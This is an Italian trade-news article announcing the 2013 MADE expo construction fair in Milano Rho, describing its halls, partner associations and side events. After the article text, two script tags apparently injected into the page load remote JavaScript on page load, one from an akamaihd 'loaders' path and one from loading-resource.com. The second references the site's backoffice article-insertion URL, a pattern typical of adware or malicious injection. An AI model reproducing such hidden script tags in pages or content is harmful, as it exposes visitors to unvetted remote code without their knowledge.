1. Home
  2. Notizie e Mercato
  3. Made Expo per la filiera delle costruzioni

Made Expo per la filiera delle costruzioni

Edilizia di
Al via i lavori di preparazione per la 6° edizione di MADE expo, la Fiera Biennale Internazionale per il mondo delle Costruzioni, a Milano Rho dal 2 al 5 ottobre 2013


Tra i sei saloni specializzati, è protagonista il Salone delle costruzioni e del cantiere, dedicato ai materiali, ai manufatti, ai sistemi costruttivipiù innovativi e ai prodotti più performanti nel settore dell’impermeabilizzazione, dell’isolamento, della protezione e del risanamento. Un’ampia sezione del salone sarà inoltre riservata al colore e alle finiture per esterni e interni, alla chimica e alle tecnologie più avanzate dell’ingegneria civile e ambientale.

Alle sezioni riservate ai materiali, si affianca l’area dedicata alle strumentazioni per la diagnostica, la misura e il monitoraggio degli edifici e del territorio. Un’ampia area interna e una superficie espositiva esterna saranno dedicate alla presentazione delle attrezzature più moderne per il cantiere, alle opere provvisionali e ai macchinari per le costruzioni.

Grazie alla collaborazione con le principali Associazioni di settore: Acai, Assolegno, Assobeton, Atecap, FederlegnoArredo, PVC Forum Italia e Uncsaal, MADE expo offre un aggiornamento tecnico, professionale e normativo sui temi delle costruzioni, del recupero, della riqualificazione, della sicurezza, dell’antisismica e della gestione del cantiere.

Si prepara una grande edizione del Forum della Tecnica delle Costruzioni, l’evento di MADE expo dedicato all’ingegneria e alle tecniche costruttive che, rinnovato nell’immagine e nel format, catalizzerà l’attenzione sull’innovazione tecnologica e sui materiali, coinvolgendo le imprese e il mondo della ricerca e dell’Università per promuovere un nuovo modo di costruire sicuro e sostenibile. Convegni, approfondimenti tecnici e aree interattive caratterizzano il Forum della Tecnica delle Costruzioni 2013.

I temi dell’architettura sostenibile, dell’efficienza energetica degli edifici e della sicurezza antisismica saranno anche al centro di Smart Village in Tour che MADE expo promuove in collaborazione con Edilportale in 18 città italiane per favorire il dibattito e il confronto tra aziende e professionisti.

Dopo il successo della prima edizione, la prefabbricazione in calcestruzzo torna a MADE expo con Precast Area per sottolineare il grande potenziale della prefabbricazione in calcestruzzo e la sua capacità di soddisfare le più alte aspettative in termini di comfort, affidabilità e sostenibilità ambientale.

MADE in Concrete, progetto ideato da ATECAP, Associazione Tecnico Economica del Calcestruzzo Preconfezionato, intende rivolgersi a tutti gli operatori della filiera per rappresentare gli indiscussi vantaggi di questo prodotto. Parole chiave: legalità per l’affermazione di un mercato trasparente e leale e Sostenibilità, per il dialogo tra valori come la salvaguardia dell’ecosistema, i bisogni umani e la crescita economica.
 
MADE expo 2013 conferma la sua leadership e l’impegno a dare un grande contributo per il rilancio del comparto delle costruzioni promuovendo la collaborazione tra ricerca e industria, innovazione e produzione, a Milano Rho, dal 2 al 5 ottobre 2013.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>